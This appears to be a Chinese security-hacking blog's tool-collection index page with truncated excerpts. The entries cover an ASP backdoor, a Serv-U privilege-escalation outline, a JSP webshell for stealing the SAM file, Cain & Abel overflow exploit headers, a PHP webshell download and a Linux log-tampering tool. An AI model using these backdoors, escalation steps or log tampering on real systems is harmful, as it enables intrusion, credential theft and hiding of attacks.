分类 ‘工具收集’ 下的日志

利用wsc 来做一个asp后门

作者:lcx

ScriptCodingInfo.wsc代码如下,该文件可以改成任意后缀

<?xml version="1.0" encoding="gb2312" standalone="yes"?>

<?component error="true" debug="true"?>

<package>

<component id="haiyangtop">
 阅读全文 »
Tags:

serv-u7 local exploit (php)

# 鬼仔:前几天浪子发我测试过,今天放出来了。

by 空虚浪子心 http://www.inbreak.net

注:由于作者懒,没有提供日志清理功能,会留下日志:

一,su7是提权有几种方式?
有两种形式去干掉su7。
1>,登陆管理员控制台的页面
==>获取OrganizationId,用于添加用户
==>获取全局用户的“下一个新用户ID”
==>添加用户
==>添加用户的权限 or 添加全局用户权限
==>用户登陆
==>执行系统命令添加系统账户。
阅读全文 »

Tags: ,

Browser Rider – a testing tool for browser exploitation

What is this about?
“Browser Rider” is a hacking framework to build payloads that exploit the browser. The project aims to provide a powerful, simple and flexible interface to any client side exploit.

Browser Rider is not a new concept. Similar tools such as BeEF or Backframe exploited the same concept. However most of the other existing tools out there are unmainted, not updated and not documented. Browser Rider wants to fill those gaps by providing a better alternative.
阅读全文 »

Tags:

Apache Tomcat runtime.getRuntime().exec() Privilege Escalation (win)

<%@ page import="java.util.*,java.io.*"%>
<%
%>

<%--
abysssec inc public material

just upload this file with abysssec.jsp and execute your command
your command will run as administrator . you can download sam file
add user or do anything you want .
note : please be gentle and don't obstructionism .
vulnerability discovered by : abysssec.com
 阅读全文 »
Tags: ,

Cain & Abel < = v4.9.24 .RDP Stack Overflow Exploit

#!/usr/bin/perl
#
# Cain & Abel <= v4.9.24 .RDP Stack Overflow Exploit
# Exploit by SkD ([email protected])
# -----------------------------------------------
#
# Nothing much to say about this one. This works on
# an updated Windows XP SP3. On Vista this exploit is way easier
# the more challenging one was on XP, and here it is.
# Enjoy :). Also remember if you want to put your own shellcode
# there are a few character restrictions and using Alpha2 or
# Alpha Numerical won't work at all.
# To open the .RDP file in Cain & Abel, click the
# "Remote Password Decoder Dialog" icon.
# Credits to Encrypt3d.M!nd.
# {Author has no responsibility over the damage you do with this!}
 阅读全文 »
Tags: ,

Cain & Abel v4.9.23 (rdp file) Buffer Overflow PoC

# exploit.py
##########################################################
# Cain & Abel v4.9.23 (rdp file) Buffer Overflow PoC
# (other versions may also affected)
# By:Encrypt3d.M!nd
#    encrypt3d.blogspot.com
#
# Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder
##########################################################
#
 阅读全文 »
Tags: ,

国外gui版phpshell

来源:鱼化石’s blog

phpshell

下载地址:webshellphpgui.rar

Tags:

logtamper

作者:xi4oyu

logtamper version1.1
logtamper是一款*修改*linux日志的工具,在修改日志文件的同时,能够保留被修改文件的时间信息(atime没改,觉得没必要)。

[root@localhost logtamper]# ./logtamper-static
Logtamper v 1.1 for linux
Copyright (C) 2008 by xi4oyu <[email protected]>
阅读全文 »

Tags: ,